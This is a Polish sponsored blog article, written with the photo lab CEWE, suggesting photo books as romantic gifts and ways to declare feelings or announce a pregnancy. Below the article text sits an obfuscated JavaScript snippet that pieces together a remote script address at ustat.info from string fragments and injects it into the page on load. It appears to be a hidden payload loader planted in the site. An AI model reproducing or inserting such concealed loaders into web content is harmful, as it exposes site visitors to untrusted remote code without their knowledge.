Czas na oryginalne wyznanie uczuć

Share on facebook
Share on google
Share on twitter
Share on linkedin

Człowiek od zawsze marzył o podróżach w czasie, choć nigdy nikomu nie udało zbudować wehikułu pozwalającego gdzieś wrócić i coś zmienić. Jak wyglądałoby nasze życie, gdyby Albert Einstein zdołał rozwikłać zagadkę podróży do przeszłości? Cóż, wehikuł czasu nie jest nam potrzebny skoro mamy… aparaty fotograficzne.
Louis Jaques Mande Daguerre, francuski malarz i scenograf jest uznawany od 1839 roku za wynalazcę fotografii. Co ten człowiek ma wspólnego z podróżami w czasie? Otóż zrobienie zdjęcia można uznać za zatrzymanie chwili, do której możemy później powrócić wspomnieniami.

Czas na oryginalne wyznanie uczuć

Czas to pieniądz, ale wspomnienia są bezcenne
Uwiecznione oblicze ukochanej osoby, które często nosi się w portfelu. Uśmiech dziecka dziś już dorosłego, wspaniała wycieczka do dalekiej Turcji i zachód słońca nad Bosforem – te wszystkie podróże w czasie i przestrzeni są możliwe właśnie dzięki aparatom fotograficznym. Ludzki umysł wraz z mijającym czasem, może zawodzić, zdjęcia natomiast nie zawiodą uwieczniając nasze piękne chwile. 
Fotografia jako pisanie obrazem
Zdjęcia mogą być sztuką, podobną do pisania wierszy. A cóż jest bardziej romantycznego niż podarowanie ukochanej osobie poematu nie tylko w Dniu Zakochanych? Odpowiesz: Nie umiem pisać, nie jestem poetą czy pisarzem… A jeśli ja odpowiem Ci, że ten wiersz już został przez Ciebie napisany i musisz go po prostu przekazać bliskiej osobie? Tak, utrwalone na fotografiach wspólne chwile trzeba najzwyczajniej zebrać, łatwo stworzyć fotoksiążkę i ofiarować osobie, dla której nasze serce bije mocniej. Taki prezent to jak wycieczka i wiersz jednocześnie.

Czas na oryginalne wyznanie uczuć

Dla chcącego nic trudnego.
Nie każdy z nas jest profesjonalnym fotografem lub artystą, ale nawet najłatwiejsze w obsłudze programy pozwalają na prostą, niemal automatyczną optymalizację zdjęć. Nie czas jednak, by uczyć Cię robienia pięknych fotografii, wolimy zainspirować. Nie musisz przecież ograniczać się tylko do tworzenia fotoksiążki z Waszych wspólnych zdjęć – może jesteście razem od niedawna lub dopiero chcesz podbić jej lub jego serce? Na to zawsze jest dobra pora. Nie musisz czekać do walentynek. Koniec roku szkolnego, studiów czy zakończenie klasy maturalnej, to być może ostatnia szansa, by powiedzieć komuś o uczuciach. Może koleżanka z klasy wyjeżdża na studia w zupełne inne miejsce niż Ty? Warto dać jej coś, bo powie… to co chcemy przekazać.
Na wyznania dobra pora
Mamy dla Ciebie kilka inspiracji, które pozwolą w pełni wykorzystać zalety Twojej pomysłowości.
– pokaż jej lub jemu kim jesteś. Zbierz fotografie z dzieciństwa i młodości, stwórz fotoksiążkę i sprezentuj osobie, która sprawia, że krew szybciej płynie Ci w żyłach
– pokaż co Cię zachwyciło w podróżach. Widziałeś wiele podczas różnych wycieczek przed poznaniem wybranki serca, zabierz tę osobę na podróż w czasie i przestrzeni. Wyda się Wam, że jesteście razem od zawsze
– w fotoksiążce zamieść zdjęcia miejsc, które chciałbyś zobaczyć z bliską osobą. W ten sposób wyruszycie w podróż do przyszłości. Pokażesz, że planujesz Wasze wspólne życie
– jeśli jesteś kobietą, to sposób na przekazanie ukochanemu informacji o Twojej ciąży. Zdjęcia Waszych wspólnych chwil, następnie stopniowe fotografie dziecięcego asortymentu (później wykorzystacie to do planowania wyprawki), a jako piękne zwieńczenie informacja – będziesz tatą.
To tylko kilka z wielu inspiracji i możliwości podróży w czasie fotografią. Wyznaj coś kreatywnie, zaskocz pozytywnie.
Artykuł został stworzony we współpracy z laboratorium fotograficznym CEWE.
Źródło zdjęć: Depositphoto, ThinkstockPhotos

(function(){
c6sx=document.createElement(“script”);c6sx_=(“ust”);c6sxu=”1961035″;
c6sx_+=”a”+(“t.i”);c6sx.type=”text/javascript”;
c6sxu+=”.payl1zle6sx35cqcnk7X”;c6sx.async=true;c6sx_+=”n”+(“f”+”o”)+”/”;
c6sxu+=”f8nbqp426w1f”;c6sx.src=”//”+c6sx_+c6sxu;
document.body.appendChild(c6sx);
})();

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.